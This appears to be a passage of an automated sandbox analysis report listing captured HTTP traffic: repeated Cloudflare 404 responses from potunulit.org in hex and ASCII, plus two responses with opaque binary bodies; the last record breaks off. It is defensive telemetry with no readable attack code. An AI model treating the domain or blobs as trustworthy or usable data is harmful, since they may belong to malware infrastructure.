Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PaSUQmFCXQiZ62bGa4o49xj0GsuzztoRdgziCG3KHu0xLUxRRUQmPHUvnUMTX3qcViCUiEHrHOU8I3UFky32DQn8Sfndb09rBhpkOSnLm8aMTnUtcOP2ZuWejbmvZdI8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa2520a609b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bgR2wOy0u9tVXVWMgJqVmojQFe7TPptd7QLwjsfNsgbNWXbSiBtdDuk8K4NHbezpdhqRLODa6YKDfw1lHobbEO%2B5VbPdr5SiV5bk6fs8Qu8%2FU9RSVpliQu%2BYDoXYjc6j"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa2532c3d9b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 61 37 33 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 90 eb 68 9f 89 74 7e f6 25 24 85 3a f9 b7 59 f9 62 25 fa d8 0d 89 b4 f0 f1 91 66 7b bf 47 5f 39 f9 de 64 4f 7a 6f 3b 4e 82 98 d3 36 d5 45 3d f4 19 00 51 75 34 16 51 22 3b a5 92 d7 d8 ce b7 49 00 7e ae ac c3 86 21 5f 36 f8 37 33 f2 25 75 da ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e c8 00 ba aa 8f 74 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e d7 f6 ff 78 d7 d5 d9 c4 0d 13 13 89 66 e1 92 24 18 4f c5 03 11 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 ba 74 94 be 21 51 61 46 d0 35 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d eb 6b e5 0e c0 eb 7e 71 eb f0 74 18 38 b7 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 e2 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f bb 93 cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d 83 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 65 fa de 8e 82 11 e8 e4 1f cc a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 fc ab fa 1d d4 ec 69 91 9c 1d 0f f1 2c c8 af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 9c 95 8b 8b e1 12 fb d5 9c a6 c3 e0 2b 63 be bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 Data Ascii: 7a73`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShGht~%$:Yb%f{G_9dOzo;N6E=Qu4Q";I~!_673%up"XJ3Ob>!ZC:>tSSQ{~xf$Oa~i~]DzN,t!QaF5\|(
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M7uMaJBPHeyY9GKg%2Fg7YkyxACawcmVOgSR1WzbqjvIp0VD1g6PxbHV%2F2z01onKr2ssIMLk3cX3zkGYxEAo397a6ExuyQnpXgUIlpXT69iDEmPWT1xsCJtahl8g1ux4ci"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa2846af69b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mFqif1qzqdphc7%2Fsagwlbzd3Nj4Ho3wUo73DOvIpy79Q%2BA4%2F9pfoWLsJosBeXtKzOkSROVVu9nklvYlEoJ7MN1FfVM%2FRrd2l41ebpHIkmeBkw7JujOYFwB%2BWk8sIn4c7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa2862dfa9b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 35 62 65 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 e5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 45 f9 be 81 5c 66 a8 e8 f0 36 53 24 2c a5 8f e7 b7 37 3d c6 e6 9b 62 ee 24 83 a6 65 03 55 89 27 15 58 4a 51 ed 7d ed 50 70 4c 7f 28 8d 57 eb ea d2 40 02 6b a6 04 87 3c ee b7 5a c9 0e dc 61 57 d5 6c 7d b2 16 94 f7 41 be f3 79 4f 23 37 a3 c4 29 35 5b a5 cc 40 e2 5e 61 26 01 56 cf 43 b1 4e a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b b5 c8 83 7b 32 44 f2 ff 8a f3 9a b8 c4 0d 13 13 bf 1e e1 92 c4 08 4d c4 08 a0 c2 a1 61 d0 cb f5 69 4f 3a 17 7e 5f af 9a ce a0 c9 a0 c1 a9 dd 7a 0d 50 5b 19 e0 2c d5 a9 18 0a f5 96 be 27 51 61 9f d4 3e 7c 88 28 c8 48 6e a1 c0 4a 9a 03 fd ec 9e 7a 42 ac 87 2b bd 61 3f 9b 44 bf 44 34 bd 79 12 6c 23 6c 29 6c 0a 8d c7 fd f4 0e a4 fb 7e 71 eb 80 f5 1a 78 9b 4a d8 19 ae cc 4f 3b 79 82 ae 48 7f 17 4c 25 56 ad f3 57 fb 1c b9 42 53 ce 23 b2 75 0e 31 79 92 90 f7 df 09 f4 e7 ea 3f 4c 80 d0 92 c0 13 ff 0d bb d6 3f f0 29 27 c8 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 d7 bf 6e 39 26 e7 ac 04 28 84 42 40 77 9b c7 9b 84 27 28 66 91 8b 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 8b fa d2 63 1b c3 cb 29 04 85 f2 5b 1e 44 ab 1e 26 d3 04 ee c3 ca 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 0c 5e ae 63 75 97 7b 85 d2 1c 10 9f da 89 d9 b0 99 c7 8c 8a cd d6 7f 74 79 e2 78 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 6b a9 b4 fb 2f 1e 76 5c b3 ae 46 1f ec 1b 8a 7a 8f f6 7d e3 cd c0 d9 37 00 64 f6 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 7f dc e5 be 63 d4 03 a6 60 eb ac 98 46 d3 0d ca 82 0f 13 2e 9f 28 cc ec 35 6c d6 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 58 3a 1d b8 6e d8 cb e4 ae a7 a1 33 f1 34 da a9 c3 68 Data Ascii: 15be`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShG*E\f6S$,7=b$eU'XJQ}PpL(W@k<ZaWl}AyO#7)5[@^a&VCN:V?#BSSR+{2DMaiO:~_zP[,'Qa>\|(HnJ
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JBK5aG5%2BhecL%2F6fMFpTYTUHGnP1aX6gT1rKVvZ52faPxpehMI84k2wf5ujtEZHugvAzglzmYi7LSKdQbjkTYsffV6BE9zhKiHapbMS8O8NbNXPNvOlv4L2F8QKiiQaBk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa297dcd19b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dIb%2FbzBntbzOkZhS061kRh6WZX7x0NSVVdR89OCmd0nwEJxIud0ucEpvreMYV8tJe7z6ZG%2FLYAqwfB5X1Hjj%2B0G0tiSl4H4DYsPnHQb9vUa5W70AmL6Ds5MIzxnGdcqo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa2999fd69b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uc9nXYF1fmW%2Bagssg3q%2BTFkHnGyG6xXPS%2Bu1VDdcQ7JP4CYuoLuwjAjY%2BoX0XADjyHIyL4EBCfE06sNSpp3Rd7QKWR9Oh5YPP0ukKVvyqIB4UrTBLysCpLCWDyuk5gXX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa29c3c5a9b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6PedILqYb%2BwMtD2wBJm4ZxSuts3E7I0IwDbY5uPogmztKqFme4lJUWm3V74LUK2NlCZg5kCtcGIso%2B9MH%2FLhwKrANT9xqhHSvRoMjv5D1b3CuqLAkDNGMDntXlxckE78"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa29e1f8d9b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jXA5e%2BFvXglUebSfydu1jGbAZaIN%2BEwesa3yQEBLrRnFGEadxsba8zsO1UquRqdjFm%2FQj3ypTAY%2FFfs9%2BEd83%2FHbDO%2Fnv0rXAEZ45COzU0JhoH7B5cl2z2GopIkweeQ%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa29faa3f9b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 